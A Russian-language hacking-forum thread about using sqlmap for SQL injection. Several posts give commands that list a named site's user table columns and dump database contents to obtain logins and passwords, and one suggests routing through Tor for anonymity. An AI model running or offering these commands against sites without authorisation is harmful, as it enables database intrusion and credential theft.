HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу SQLMAP: Полное руководство 2025 по SQL-инъекциям. От основ до обхода WAF
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.09.2018, 11:25
mobius0707
Новичок
Регистрация: 13.07.2017
Сообщений: 0
С нами: 4649934

Репутация: 0
По умолчанию
Здравствуйте, небольшой мануал по поиску SQLi в примерах The SQL Injection Knowledge Base
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.09.2018, 01:12
moeimya
Новичок
Регистрация: 02.04.2017
Сообщений: 0
С нами: 4796849

Репутация: 0
По умолчанию
Печально когда доходишь до паролей а там AES
 
Ответить с цитированием

  #3  
Старый 07.01.2020, 23:50
Sqlshik
Новичок
Регистрация: 07.01.2020
Сообщений: 0
С нами: 3341985

Репутация: 0
По умолчанию
И oпять вызываем уже знакомую процедуру --columns (колоночки) но уже по таблице "user_".

Код:


Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T user_info --columns
Далее меня заинтересовало то что в сети находяться 4ре хоста, но в колоночке Избыточность...
 
Ответить с цитированием

  #4  
Старый 08.01.2020, 16:56
B6D4
Новичок
Регистрация: 22.12.2019
Сообщений: 0
С нами: 3366295

Репутация: 0
По умолчанию


И что дальше делать?как увидеть логин и пароль?

Яполный ламер,не судите строго.
 
Ответить с цитированием

  #5  
Старый 08.01.2020, 17:19
explorer
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами: 4091032

Репутация: 0
По умолчанию
Цитата:

B6D4 сказал(а):

И что дальше делать?как увидеть логин и пароль?

Яполный ламер,не судите строго.

sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы -C название колонки --dump
или ещё проще, без названия колонки, вытащит сразу все данные изо всех колонок (применять, если данных мало)
sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы --dump
 
Ответить с цитированием

  #6  
Старый 13.02.2020, 09:21
Hudjii5
Новичок
Регистрация: 17.09.2019
Сообщений: 0
С нами: 3503223

Репутация: 0
По умолчанию
Цитата:

Magnit сказал(а):

Объясните или, если не сложно, дайте ссылку где описано, в чем разница в параметрах --level u --risk
Много инфы, да и на практике CTF не один раз валил БД с --level=5 --risk=3
при включении v3 увидел разницу, что при параметре risk=1 не используются where, он требует risk=3, но что к примеру делает risk=2, и levels не понимаю
спасибо за ответ

Тоже хотелось бы подробнее узнать
 
Ответить с цитированием

  #7  
Старый 01.03.2020, 11:25
sith_ortodox
Новичок
Регистрация: 11.10.2018
Сообщений: 0
С нами: 3995009

Репутация: 0
По умолчанию
Неплохо бы еще добавлять параметры --tor и --check-tor (добавит немножко анонимности в пентест)
 
Ответить с цитированием

  #8  
Старый 07.03.2020, 00:28
kravl
Новичок
Регистрация: 02.09.2018
Сообщений: 0
С нами: 4051737

Репутация: 0
По умолчанию
Можно ли эти знания применять определенно на 1 сайт или только, те которые имеют подобный дорк ?
 
Ответить с цитированием

  #9  
Старый 19.07.2020, 01:24
picasoready
Новичок
Регистрация: 19.07.2020
Сообщений: 0
С нами: 3063910

Репутация: 0
По умолчанию
самое главное не сказали, а где скачать этот sqlmap
 
Ответить с цитированием

  #10  
Старый 21.07.2020, 11:36
jeric
Новичок
Регистрация: 20.07.2020
Сообщений: 0
С нами: 3061849

Репутация: 0
По умолчанию
Цитата:

picasoready сказал(а):

самое главное не сказали, а где скачать этот sqlmap
На их официальном сайте. Гугл тебе в помощь. Хотя наверное, это не твое...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.